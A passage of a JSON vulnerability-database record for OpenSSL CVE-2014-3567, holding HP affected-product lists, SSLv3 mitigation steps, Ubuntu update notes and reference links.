3800-24G-PoE+-2SFP+ Switch\nJ9574A HP 3800-48G-PoE+-4SFP+ Switch\nJ9575A HP 3800-24G-2SFP+ Switch\nJ9576A HP 3800-48G-4SFP+ Switch\nJ9584A HP 3800-24SFP-2SFP+ Switch\nJ9585A HP 3800-24G-2XG Switch\nJ9586A HP 3800-48G-4XG Switch\nJ9587A HP 3800-24G-PoE+-2XG Switch\nJ9588A HP 3800-48G-PoE+-4XG Switch\n\nKB\n Fixes in progress\nuse mitigations\n J9821A HP 5406R zl2 Switch\nJ9822A HP 5412R zl2 Switch\nJ9823A HP 5406R-Gig-T-PoE+/SFP+ v2 zl2 Swch\nJ9824A HP 5406R-Gig-T-PoE+/SFP v2 zl2 Swch\nJ9825A HP 5412R-Gig-T-PoE+/SFP+ v2 zl2 Swch\nJ9826A HP 5412R-Gig-T-PoE+/SFP v2 zl2 Swch\nJ9850A HP 5406R zl2 Switch\nJ9851A HP 5412R zl2 Switch\nJ9868A HP 5406R-8XGT/8SFP+ v2 zl2 Swch\n\nL\n Fixes in progress\nuse mitigations\n J8772B HP 4202-72 Vl Switch\nJ8770A HP 4204 Vl Switch Chassis\nJ9064A HP 4204-44G-4SFP Vl Switch\nJ8773A HP 4208 Vl Switch Chassis\nJ9030A HP 4208-68G-4SFP Vl Switch\nJ8775B HP 4208-96 Vl Switch\nJ8771A ProCurve Switch 4202VL-48G\nJ8772A ProCurve Switch 4202VL-72\nJ8774A ProCurve Switch 4208VL-64G\nJ8775A ProCurve Switch 4208VL-96\n\nM.08\n Fixes in progress\nuse mitigations\n J8433A HP 6400-6XG cl Switch\nJ8474A HP 6410-6XG cl Switch\n\nM.10\n Fixes in progress\nuse mitigations\n J4906A HP E3400-48G cl Switch\nJ4905A HP ProCurve Switch 3400cl-24G\n\nN\n Fixes in progress\nuse mitigations\n J9021A HP 2810-24G Switch\nJ9022A HP 2810-48G Switch\n\nPA\n Fixes in progress\nuse mitigations\n J9029A ProCurve Switch 1800-8G\n\nPB\n Fixes in progress\nuse mitigations\n J9028A ProCurve Switch 1800-24G\nJ9028B ProCurve Switch 1800-24G\n\nQ\n Fixes in progress\nuse mitigations\n J9019B HP 2510-24 Switch\nJ9019A ProCurve Switch 2510-24\n\nR\n Fixes in progress\nuse mitigations\n J9085A HP 2610-24 Switch\nJ9087A HP 2610-24-PoE Switch\nJ9086A HP 2610-24-PPoE Switch\nJ9088A HP 2610-48 Switch\nJ9089A HP 2610-48-PoE Switch\n\nRA\n Fixes in progress\nuse mitigations\n J9623A HP 2620-24 Switch\nJ9624A HP 2620-24-PPoE+ Switch\nJ9625A HP 2620-24-PoE+ Switch\nJ9626A HP 2620-48 Switch\nJ9627A HP 2620-48-PoE+ Switch\n\nS\n Fixes in progress\nuse mitigations\n J9138A HP 2520-24-PoE Switch\nJ9137A HP 2520-8-PoE Switch\n\nT\n Fixes in progress\nuse mitigations\n J9049A ProCurve Switch 2900- 24G\nJ9050A ProCurve Switch 2900 48G\n\nU\n Fixes in progress\nuse mitigations\n J9020A HP 2510-48 Switch\n\nVA\n Fixes in progress\nuse mitigations\n J9079A HP 1700-8 Switch\n\nVB\n Fixes in progress\nuse mitigations\n J9080A HP 1700-24 Switch\n\nW\n Fixes in progress\nuse mitigations\n J9145A HP 2910-24G al Switch\nJ9146A HP 2910-24G-PoE+ al Switch\nJ9147A HP 2910-48G al Switch\nJ9148A HP 2910-48G-PoE+ al Switch\n\nWB\n Fixes in progress\nuse mitigations\n J9726A HP 2920-24G Switch\nJ9727A HP 2920-24G-POE+ Switch\nJ9728A HP 2920-48G Switch\nJ9729A HP 2920-48G-POE+ Switch\nJ9836A HP 2920-48G-POE+ 740W Switch\n\nY\n Fixes in progress\nuse mitigations\n J9279A HP 2510-24G Switch\nJ9280A HP 2510-48G Switch\n\nYA\n Fixes in progress\nuse mitigations\n J9772A HP 2530-48G-PoE+ Switch\nJ9773A HP 2530-24G-PoE+ Switch\nJ9774A HP 2530-8G-PoE+ Switch\nJ9775A HP 2530-48G Switch\nJ9776A HP 2530-24G Switch\nJ9777A HP 2530-8G Switch\nJ9778A HP 2530-48-PoE+ Switch\nJ9781A HP 2530-48 Switch\nJ9853A HP 2530-48G-PoE+-2SFP+ Switch\nJ9854A HP 2530-24G-PoE+-2SFP+ Switch\nJ9855A HP 2530-48G-2SFP+ Switch\nJ9856A HP 2530-24G-2SFP+ Switch\n\nYB\n Fixes in progress\nuse mitigations\n J9779A HP 2530-24-PoE+ Switch\nJ9780A HP 2530-8-PoE+ Switch\nJ9782A HP 2530-24 Switch\nJ9783A HP 2530-8 Switch\n\nMSM 6.5\n 6.5.1.0\n J9420A HP MSM760 Premium Mobility Controller\nJ9421A HP MSM760 Access Controller\nJ9370A HP MSM765 Zl Premium Mobility Controller\nJ9693A HP MSM720 Access Controller (WW)\nJ9694A HP MSM720 Premium Mobility Cntlr (WW)\nJ9695A HP MSM720 TAA Access Controller\nJ9696A HP MSM720 TAA Premium Mobility Cntlr\nJ9840A HP MSM775 zl Premium Controller Module\nJ9845A HP 560 Wireless 802.11ac (AM) AP\nJ9846A HP 560 Wireless 802.11ac (WW) AP\nJ9847A HP 560 Wireless 802.11ac (JP) AP\nJ9848A HP 560 Wireless 802.11ac (IL) AP\nJ9358A HP E-MSM422 Access Point (US)\nJ9358B HP MSM422 Access Point (US)\nJ9359A HP E-MSM422 Access Point (WW)\nJ9359B HP MSM422 Access Point (WW)\nJ9530A HP E-MSM422 Access Point (JP)\nJ9530B HP MSM422 Access Point (JP)\nJ9617A HP MSM422 Dual Radio 802.11n AP (IL)\nJ9426A HP E-MSM410 Access Point (US)\nJ9426B HP MSM410 Access Point (US)\nJ9427A HP E-MSM410 Access Point (WW)\nJ9427B HP MSM410 Access Point (WW)\nJ9427C HP MSM410 Access Point (WW)\nJ9529A HP E-MSM410 Access Point (JP)\nJ9529B HP MSM410 Access Point (JP)\nJ9589A HP MSM460 Dual Radio 802.11n AP (JP)\nJ9590A HP MSM460 Dual Radio 802.11n AP (AM)\nJ9591A HP MSM460 Dual Radio 802.11n AP (WW)\nJ9616A HP MSM410 Single Radio 802.11n AP (IL)\nJ9618A HP MSM460 Dual Radio 802.11n AP (IL)\nJ9619A HP MSM466 Dual Radio 802.11n AP (IL)\nJ9620A HP MSM466 Dual Radio 802.11n AP (JP)\nJ9621A HP MSM466 Dual Radio 802.11n AP (AM)\nJ9622A HP MSM466 Dual Radio 802.11n AP (WW)\nJ9650A HP MSM430 Dual Radio 802.11n AP (AM)\nJ9651A HP MSM430 Dual Radio 802.11n AP (WW)\nJ9652A HP MSM430 Dual Radio 802.11n AP (JP)\nJ9653A HP MSM430 Dual Radio 802.11n AP (IL)\nJ9654A HP MSM430 Dual Radio 802.11n TAA AP\nJ9655A HP MSM460 Dual Radio 802.11n TAA AP\nJ9656A HP MSM466 Dual Radio 802.11n TAA AP\nJ9715A HP E-MSM466-R Dual Radio 802.11n AP (AM)\nJ9716A HP E-MSM466-R Dual Radio 802.11n AP (WW)\nJ9717A HP E-MSM466-R Dual Radio 802.11n AP (JP)\nJ9718A HP E-MSM466-R Dual Radio 802.11n AP (IL)\n\nMSM 6.4\n 6.4.2.1\n J9840A HP MSM775 zl Premium Controller Module\nJ9370A HP MSM765 Zl Premium Mobility Controller\nJ9420A HP MSM760 Premium Mobility Controller\nJ9421A HP MSM760 Access Controller\nJ9693A HP MSM720 Access Controller (WW)\nJ9694A HP MSM720 Premium Mobility Cntlr (WW)\nJ9695A HP MSM720 TAA Access Controller\nJ9696A HP MSM720 TAA Premium Mobility Cntlr\nJ9426A HP E-MSM410 Access Point (US)\nJ9426B HP MSM410 Access Point (US)\nJ9427A HP E-MSM410 Access Point (WW)\nJ9427B HP MSM410 Access Point (WW)\nJ9427C HP MSM410 Access Point (WW)\nJ9529A HP E-MSM410 Access Point (JP)\nJ9529B HP MSM410 Access Point (JP)\nJ9589A HP MSM460 Dual Radio 802.11n AP (JP)\nJ9590A HP MSM460 Dual Radio 802.11n AP (AM)\nJ9591A HP MSM460 Dual Radio 802.11n AP (WW)\nJ9616A HP MSM410 Single Radio 802.11n AP (IL)\nJ9618A HP MSM460 Dual Radio 802.11n AP (IL)\nJ9619A HP MSM466 Dual Radio 802.11n AP (IL)\nJ9620A HP MSM466 Dual Radio 802.11n AP (JP)\nJ9621A HP MSM466 Dual Radio 802.11n AP (AM)\nJ9622A HP MSM466 Dual Radio 802.11n AP (WW)\nJ9650A HP MSM430 Dual Radio 802.11n AP (AM)\nJ9651A HP MSM430 Dual Radio 802.11n AP (WW)\nJ9652A HP MSM430 Dual Radio 802.11n AP (JP)\nJ9653A HP MSM430 Dual Radio 802.11n AP (IL)\nJ9654A HP MSM430 Dual Radio 802.11n TAA AP\nJ9655A HP MSM460 Dual Radio 802.11n TAA AP\nJ9656A HP MSM466 Dual Radio 802.11n TAA AP\nJ9715A HP E-MSM466-R Dual Radio 802.11n AP (AM)\nJ9716A HP E-MSM466-R Dual Radio 802.11n AP (WW)\nJ9717A HP E-MSM466-R Dual Radio 802.11n AP (JP)\nJ9718A HP E-MSM466-R Dual Radio 802.11n AP (IL)\nJ9358A HP E-MSM422 Access Point (US)\nJ9358B HP MSM422 Access Point (US)\nJ9359A HP E-MSM422 Access Point (WW)\nJ9359B HP MSM422 Access Point (WW)\nJ9530A HP E-MSM422 Access Point (JP)\nJ9530B HP MSM422 Access Point (JP)\nJ9617A HP MSM422 Dual Radio 802.11n AP (IL)\n\nMSM 6.3\n 6.3.1.0\n J9529B HP MSM410 Access Point (JP)\nJ9589A HP MSM460 Dual Radio 802.11n AP (JP)\nJ9590A HP MSM460 Dual Radio 802.11n AP (AM)\nJ9591A HP MSM460 Dual Radio 802.11n AP (WW)\nJ9616A HP MSM410 Single Radio 802.11n AP (IL)\nJ9618A HP MSM460 Dual Radio 802.11n AP (IL)\nJ9619A HP MSM466 Dual Radio 802.11n AP (IL)\nJ9620A HP MSM466 Dual Radio 802.11n AP (JP)\nJ9621A HP MSM466 Dual Radio 802.11n AP (AM)\nJ9622A HP MSM466 Dual Radio 802.11n AP (WW)\nJ9650A HP MSM430 Dual Radio 802.11n AP (AM)\nJ9651A HP MSM430 Dual Radio 802.11n AP (WW)\nJ9652A HP MSM430 Dual Radio 802.11n AP (JP)\nJ9653A HP MSM430 Dual Radio 802.11n AP (IL)\nJ9654A HP MSM430 Dual Radio 802.11n TAA AP\nJ9655A HP MSM460 Dual Radio 802.11n TAA AP\nJ9656A HP MSM466 Dual Radio 802.11n TAA AP\nJ9715A HP E-MSM466-R Dual Radio 802.11n AP (AM)\nJ9716A HP E-MSM466-R Dual Radio 802.11n AP (WW)\nJ9717A HP E-MSM466-R Dual Radio 802.11n AP (JP)\nJ9718A HP E-MSM466-R Dual Radio 802.11n AP (IL)\nJ9356A HP E-MSM335 Access Point (US)\nJ9356B HP MSM335 Access Point (US)\nJ9357A HP E-MSM335 Access Point (WW)\nJ9357B HP MSM335 Access Point (WW)\nJ9358A HP E-MSM422 Access Point (US)\nJ9358B HP MSM422 Access Point (US)\nJ9359A HP E-MSM422 Access Point (WW)\nJ9359B HP MSM422 Access Point (WW)\nJ9530A HP E-MSM422 Access Point (JP)\nJ9530B HP MSM422 Access Point (JP)\nJ9617A HP MSM422 Dual Radio 802.11n AP (IL)\nJ9360A HP E-MSM320 Access Point (US)\nJ9360B HP MSM320 Access Point (US)\nJ9364A HP E-MSM320 Access Point (WW)\nJ9364B HP MSM320 Access Point (WW)\nJ9365A HP MSM320-R Access Point (US)\nJ9365B HP MSM320-R Access Point (US)\nJ9368A HP E-MSM320-R Access Point (WW)\nJ9368B HP MSM320-R Access Point (WW)\nJ9373A HP E-MSM325 Access Point (WW)\nJ9373B HP MSM325 Access Point (WW)\nJ9374A HP E-MSM310 Access Point (US)\nJ9374B HP MSM310 Access Point (US)\nJ9379A HP MSM310 Access Point (WW)\nJ9379B HP MSM310 Access Point (WW)\nJ9380A HP E-MSM310-R Access Point (US)\nJ9380B HP MSM310-R Access Point (US)\nJ9383A HP E-MSM310-R Access Point (WW)\nJ9383B HP MSM310-R Access Point (WW)\nJ9524A HP E-MSM310 Access Point (JP)\nJ9524B HP MSM310 Access Point (JP)\nJ9527A HP E-MSM320 Access Point (JP)\nJ9527B HP MSM320 Access Point (JP)\nJ9528A HP E-MSM320-R Access Point (JP)\nJ9528B HP MSM320-R Access Point (JP)\n\nMSM 6.2\n 6.2.1.2\n J9370A HP MSM765 Zl Premium Mobility Controller\nJ9356A HP E-MSM335 Access Point (US)\nJ9356B HP MSM335 Access Point (US)\nJ9357A HP E-MSM335 Access Point (WW)\nJ9357B HP MSM335 Access Point (WW)\nJ9358A HP E-MSM422 Access Point (US)\nJ9358B HP MSM422 Access Point (US)\nJ9359A HP E-MSM422 Access Point (WW)\nJ9359B HP MSM422 Access Point (WW)\nJ9530A HP E-MSM422 Access Point (JP)\nJ9530B HP MSM422 Access Point (JP)\nJ9617A HP MSM422 Dual Radio 802.11n AP (IL)\nJ9420A HP MSM760 Premium Mobility Controller\nJ9421A HP MSM760 Access Controller\nJ9840A HP MSM775 zl Premium Controller Module\nJ9360A HP E-MSM320 Access Point (US)\nJ9360B HP MSM320 Access Point (US)\nJ9364A HP E-MSM320 Access Point (WW)\nJ9364B HP MSM320 Access Point (WW)\nJ9365A HP MSM320-R Access Point (US)\nJ9365B HP MSM320-R Access Point (US)\nJ9368A HP E-MSM320-R Access Point (WW)\nJ9368B HP MSM320-R Access Point (WW)\nJ9373A HP E-MSM325 Access Point (WW)\nJ9373B HP MSM325 Access Point (WW)\nJ9374A HP E-MSM310 Access Point (US)\nJ9374B HP MSM310 Access Point (US)\nJ9379A HP MSM310 Access Point (WW)\nJ9379B HP MSM310 Access Point (WW)\nJ9380A HP E-MSM310-R Access Point (US)\nJ9380B HP MSM310-R Access Point (US)\nJ9383A HP E-MSM310-R Access Point (WW)\nJ9383B HP MSM310-R Access Point (WW)\nJ9524A HP E-MSM310 Access Point (JP)\nJ9524B HP MSM310 Access Point (JP)\nJ9527A HP E-MSM320 Access Point (JP)\nJ9527B HP MSM320 Access Point (JP)\nJ9528A HP E-MSM320-R Access Point (JP)\nJ9528B HP MSM320-R Access Point (JP)\nJ9426A HP E-MSM410 Access Point (US)\nJ9426B HP MSM410 Access Point (US)\nJ9427A HP E-MSM410 Access Point (WW)\nJ9427B HP MSM410 Access Point (WW)\nJ9427C HP MSM410 Access Point (WW)\nJ9529A HP E-MSM410 Access Point (JP)\nJ9529B HP MSM410 Access Point (JP)\nJ9589A HP MSM460 Dual Radio 802.11n AP (JP)\nJ9590A HP MSM460 Dual Radio 802.11n AP (AM)\nJ9591A HP MSM460 Dual Radio 802.11n AP (WW)\nJ9616A HP MSM410 Single Radio 802.11n AP (IL)\nJ9618A HP MSM460 Dual Radio 802.11n AP (IL)\nJ9619A HP MSM466 Dual Radio 802.11n AP (IL)\nJ9620A HP MSM466 Dual Radio 802.11n AP (JP)\nJ9621A HP MSM466 Dual Radio 802.11n AP (AM)\nJ9622A HP MSM466 Dual Radio 802.11n AP (WW)\nJ9650A HP MSM430 Dual Radio 802.11n AP (AM)\nJ9651A HP MSM430 Dual Radio 802.11n AP (WW)\nJ9652A HP MSM430 Dual Radio 802.11n AP (JP)\nJ9653A HP MSM430 Dual Radio 802.11n AP (IL)\nJ9654A HP MSM430 Dual Radio 802.11n TAA AP\nJ9655A HP MSM460 Dual Radio 802.11n TAA AP\nJ9656A HP MSM466 Dual Radio 802.11n TAA AP\nJ9715A HP E-MSM466-R Dual Radio 802.11n AP (AM)\nJ9716A HP E-MSM466-R Dual Radio 802.11n AP (WW)\nJ9717A HP E-MSM466-R Dual Radio 802.11n AP (JP)\nJ9718A HP E-MSM466-R Dual Radio 802.11n AP (IL)\nJ9693A HP MSM720 Access Controller (WW)\nJ9694A HP MSM720 Premium Mobility Cntlr (WW)\nJ9695A HP MSM720 TAA Access Controller\nJ9696A HP MSM720 TAA Premium Mobility Cntlr\n\nM220\n Fixes in progress\nuse mitigations\n J9798A HP M220 802.11n (AM) Access Point\nJ9799A HP M220 802.11n (WW) Access Point\n\nM210\n Fixes in progress\nuse mitigations\n JL023A HP M210 802.11n (AM) Access Point\nJL024A HP M210 802.11n (WW) Access Point\n\nPS110\n Fixes in progress\nuse mitigations\n JL065A HP PS110 Wireless 802.11n VPN AM Router\nJL066A HP PS110 Wireless 802.11n VPN WW Router\n\nHP Office Connect 1810 PK\n Fixes in progress\nuse mitigations\n J9660A HP 1810-48G Switch\n\nHP Office Connect 1810 P\n Fixes in progress\nuse mitigations\n J9450A HP 1810-24G Switch\nJ9449A HP 1810-8G Switch\n\nHP Office Connect 1810 PL\n Fixes in progress\nuse mitigations\n J9802A HP 1810-8G v2 Switch\nJ9803A HP 1810-24G v2 Switch\n\nRF Manager\n Fixes in progress\nuse mitigations\n J9522A HP E-MSM415 RF Security Sensor J9521A HP RF Manager Controller with\n50 Sensor License J9838AAE HP RF Manager for VMware 50 Sensor E-LTU\n\nHP Office Connect 1810 PM\n Fixes in progress\nuse mitigations\n J9800A HP 1810-8 v2 Switch\nJ9801A HP 1810-24 v2 Switch\n\nHP Office Connect PS1810\n Fixes in progress\nuse mitigations\n J9833A HP PS1810-8G Switch\nJ9834A HP PS1810-24G Switch\n\nMitigation Instructions\n\nFor SSLv3 Server Functionality on Impacted Products:\n\nDisable SSLv3 on clients\nand/or disable CBC ciphers on clients\nUse Access Control functionality to control client access\n\nFor SSLv3 Client Functionality on Impacted Products:\n\nGo to SSL server and disable SSLv3\nand/or disable CBC ciphers\nUse Access Control functionality to control access to servers\n\nHISTORY\nVersion:1 (rev.1) - 2 April 2015 Initial release\n\nThird Party Security Patches: Third party security patches that are to be\ninstalled on systems running HP software products should be applied in\naccordance with the customer\u0027s patch management policy. The HP Matrix\nOperating Environment v7.2.3 Update kit applicable to HP Matrix Operating\nEnvironment 7.2.x installations is available at the following location:\n\nhttps://h20392.www2.hp.com/portal/swdepot/displayProductInfo.do?productNumber\n=HPID\n\nNOTE: Please read the readme.txt file before proceeding with the\ninstallation. \nHP BladeSystem c-Class Onboard Administrator (OA) 4.30 and earlier. \n\nGo to\nhttp://www.hp.com/go/oa\n\nSelect \"Onboard Administrator Firmware\"\nSelect product name as \"\"HP BLc3000 Onboard Administrator Option\" or \"HP\nBLc7000 Onboard Administrator Option\"\nSelect the operating system from the list of choices\nSelect Firmware version 4.40 for download\nRefer to the HP BladeSystem Onboard Administrator User Guide for steps to\nupdate the Onboard Administrator firmware. ============================================================================\nUbuntu Security Notice USN-2385-1\nOctober 16, 2014\n\nopenssl vulnerabilities\n============================================================================\n\nA security issue affects these releases of Ubuntu and its derivatives:\n\n- Ubuntu 14.04 LTS\n- Ubuntu 12.04 LTS\n- Ubuntu 10.04 LTS\n\nSummary:\n\nSeveral security issues were fixed in OpenSSL. \nThis issue only affected Ubuntu 12.04 LTS and Ubuntu 14.04 LTS. \n\nUpdate instructions:\n\nThe problem can be corrected by updating your system to the following\npackage versions:\n\nUbuntu 14.04 LTS:\n libssl1.0.0 1.0.1f-1ubuntu2.7\n\nUbuntu 12.04 LTS:\n libssl1.0.0 1.0.1-4ubuntu5.20\n\nUbuntu 10.04 LTS:\n libssl0.9.8 0.9.8k-7ubuntu8.22\n\nAfter a standard system update you need to reboot your computer to make all\nthe necessary changes", "sources": [ { "db": "NVD", "id": "CVE-2014-3567" }, { "db": "BID", "id": "70586" }, { "db": "PACKETSTORM", "id": "169664" }, { "db": "PACKETSTORM", "id": "128793" }, { "db": "PACKETSTORM", "id": "128728" }, { "db": "PACKETSTORM", "id": "132080" }, { "db": "PACKETSTORM", "id": "133617" }, { "db": "PACKETSTORM", "id": "132081" }, { "db": "PACKETSTORM", "id": "128921" }, { "db": "VULMON", "id": "CVE-2014-3567" }, { "db": "PACKETSTORM", "id": "131044" }, { "db": "PACKETSTORM", "id": "132085" }, { "db": "PACKETSTORM", "id": "131014" }, { "db": "PACKETSTORM", "id": "131273" }, { "db": "PACKETSTORM", "id": "128838" }, { "db": "PACKETSTORM", "id": "130815" }, { "db": "PACKETSTORM", "id": "131306" }, { "db": "PACKETSTORM", "id": "128708" } ], "trust": 2.61 }, "external_ids": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/external_ids#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "db": "NVD", "id": "CVE-2014-3567", "trust": 3.5 }, { "db": "BID", "id": "70586", "trust": 1.4 }, { "db": "SECUNIA", "id": "62124", "trust": 1.1 }, { "db": "SECUNIA", "id": "62030", "trust": 1.1 }, { "db": "SECUNIA", "id": "61058", "trust": 1.1 }, { "db": "SECUNIA", "id": "59627", "trust": 1.1 }, { "db": "SECUNIA", "id": "61819", "trust": 1.1 }, { "db": "SECUNIA", "id": "61130", "trust": 1.1 }, { "db": "SECUNIA", "id": "61207", "trust": 1.1 }, { "db": "SECUNIA", "id": "61837", "trust": 1.1 }, { "db": "SECUNIA", "id": "61990", "trust": 1.1 }, { "db": "SECUNIA", "id": "61298", "trust": 1.1 }, { "db": "SECUNIA", "id": "62070", "trust": 1.1 }, { "db": "SECUNIA", "id": "61073", "trust": 1.1 }, { "db": "SECUNIA", "id": "61959", "trust": 1.1 }, { "db": "SECTRACK", "id": "1031052", "trust": 1.1 }, { "db": "MCAFEE", "id": "SB10091", "trust": 1.1 }, { "db": "AUSCERT", "id": "ESB-2022.0696", "trust": 0.6 }, { "db": "AUSCERT", "id": "ESB-2019.2148", "trust": 0.6 }, { "db": "CNNVD", "id": "CNNVD-201410-636", "trust": 0.6 }, { "db": "VULMON", "id": "CVE-2014-3567", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "131306", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "130815", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "128838", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "131273", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "131014", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "132085", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "131044", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "128708", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "128921", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "132081", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "133617", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "132080", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "128728", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "128793", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "169664", "trust": 0.1 } ], "sources": [ { "db": "VULMON", "id": "CVE-2014-3567" }, { "db": "BID", "id": "70586" }, { "db": "PACKETSTORM", "id": "131306" }, { "db": "PACKETSTORM", "id": "130815" }, { "db": "PACKETSTORM", "id": "128838" }, { "db": "PACKETSTORM", "id": "131273" }, { "db": "PACKETSTORM", "id": "131014" }, { "db": "PACKETSTORM", "id": "132085" }, { "db": "PACKETSTORM", "id": "131044" }, { "db": "PACKETSTORM", "id": "128708" }, { "db": "PACKETSTORM", "id": "128921" }, { "db": "PACKETSTORM", "id": "132081" }, { "db": "PACKETSTORM", "id": "133617" }, { "db": "PACKETSTORM", "id": "132080" }, { "db": "PACKETSTORM", "id": "128728" }, { "db": "PACKETSTORM", "id": "128793" }, { "db": "PACKETSTORM", "id": "169664" }, { "db": "CNNVD", "id": "CNNVD-201410-636" }, { "db": "NVD", "id": "CVE-2014-3567" } ] }, "id": "VAR-201410-1144", "iot": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": true, "sources": [ { "db": "VARIoT devices database", "id": null } ], "trust": 0.3025641 }, "last_update_date": "2024-07-23T21:24:46.357000Z", "patch": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/patch#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "title": "openssl-1.0.0o", "trust": 0.6, "url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=52068" }, { "title": "openssl-0.9.8zc", "trust": 0.6, "url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=52067" }, { "title": "openssl-1.0.1j", "trust": 0.6, "url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=52069" }, { "title": "The Register", "trust": 0.2, "url": "https://www.theregister.co.uk/2014/10/15/openssl_ddos_vulns/" }, { "title": "Red Hat: Critical: rhev-hypervisor6 security update", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=rhsa-20150126 - security advisory" }, { "title": "Red Hat: CVE-2014-3567", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_cve_database\u0026qid=cve-2014-3567" }, { "title": "Ubuntu Security Notice: openssl vulnerabilities", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=usn-2385-1" }, { "title": "Debian Security Advisories: DSA-3053-1 openssl -- security update", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=debian_security_advisories\u0026qid=89bdef3607a7448566a930eca0e94cb3" }, { "title": "Amazon Linux AMI: ALAS-2014-427", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=amazon_linux_ami\u0026qid=alas-2014-427" }, { "title": "Symantec Security Advisories: SA87 : OpenSSL Security Advisory 15-Oct-2014", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=symantec_security_advisories\u0026qid=374cff59719675d8235f907c21b99bfc" }, { "title": "Tenable Security Advisories: [R7] OpenSSL \u002720141015\u0027 Advisory Affects Tenable Products", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=tenable_security_advisories\u0026qid=tns-2014-11" }, { "title": "IBM: IBM Security Bulletin: Fabric OS firmware for Brocade 8Gb SAN Switch Module for BladeCenter is affected by vulnerabilities in OpenSSL and OpenSSH", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=ibm_psirt_blog\u0026qid=b7f5b1e7edcafce07f28205855d4db49" }, { "title": "Oracle: Oracle Critical Patch Update Advisory - January 2015", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_advisories\u0026qid=4a692d6d60aa31507cb101702b494c51" }, { "title": "Splunk Security Announcements: Splunk Enterprise versions 6.0.7 and 5.0.11 address three vulnerabilities", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=splunk_security_announcements\u0026qid=555e6256ba536e4a20d40e659e367839" }, { "title": "Splunk Security Announcements: Splunk Enterprise 6.1.5 addresses two vulnerabilities", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=splunk_security_announcements\u0026qid=dfed8c47fbdf5e7bb5fbbdd725bdfb67" }, { "title": "Citrix Security Bulletins: Multiple Security Vulnerabilities in Citrix NetScaler Platform IPMI Lights Out Management (LOM) firmware", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=citrix_security_bulletins\u0026qid=eb059834b7f24e2562bcf592b6d0afbc" }, { "title": "Oracle: Oracle Critical Patch Update Advisory - July 2015", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_advisories\u0026qid=459961024c4bdce7bb3a1a40a65a6f2e" }, { "title": "rhsecapi", "trust": 0.1, "url": "https://github.com/redhatofficial/rhsecapi " }, { "title": "cve-pylib", "trust": 0.1, "url": "https://github.com/redhatproductsecurity/cve-pylib " } ], "sources": [ { "db": "VULMON", "id": "CVE-2014-3567" }, { "db": "CNNVD", "id": "CNNVD-201410-636" } ] }, "problemtype_data": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "problemtype": "CWE-20", "trust": 1.0 }, { "problemtype": "CWE-399", "trust": 1.0 } ], "sources": [ { "db": "NVD", "id": "CVE-2014-3567" } ] }, "references": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/references#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "trust": 1.6, "url": "https://www.openssl.org/news/secadv_20141015.txt" }, { "trust": 1.5, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-3567" }, { "trust": 1.4, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21686997" }, { "trust": 1.4, "url": "http://www.splunk.com/view/sp-caaanst" }, { "trust": 1.4, "url": "http://www.oracle.com/technetwork/topics/security/cpujan2015-1972971.html" }, { "trust": 1.4, "url": "http://aix.software.ibm.com/aix/efixes/security/openssl_advisory11.asc" }, { "trust": 1.4, "url": "https://support.citrix.com/article/ctx216642" }, { "trust": 1.4, "url": "http://www.oracle.com/technetwork/topics/security/cpujul2015-2367936.html" }, { "trust": 1.3, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-3513" }, { "trust": 1.2, "url": "http://www.securityfocus.com/bid/70586" }, { "trust": 1.2, "url": "http://rhn.redhat.com/errata/rhsa-2014-1692.html" }, { "trust": 1.2, "url": "http://www.ubuntu.com/usn/usn-2385-1" }, { "trust": 1.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-3566" }, { "trust": 1.1, "url": "http://www.mandriva.com/security/advisories?name=mdvsa-2014:203" }, { "trust": 1.1, "url": "http://rhn.redhat.com/errata/rhsa-2014-1652.html" }, { "trust": 1.1, "url": "http://www.debian.org/security/2014/dsa-3053" 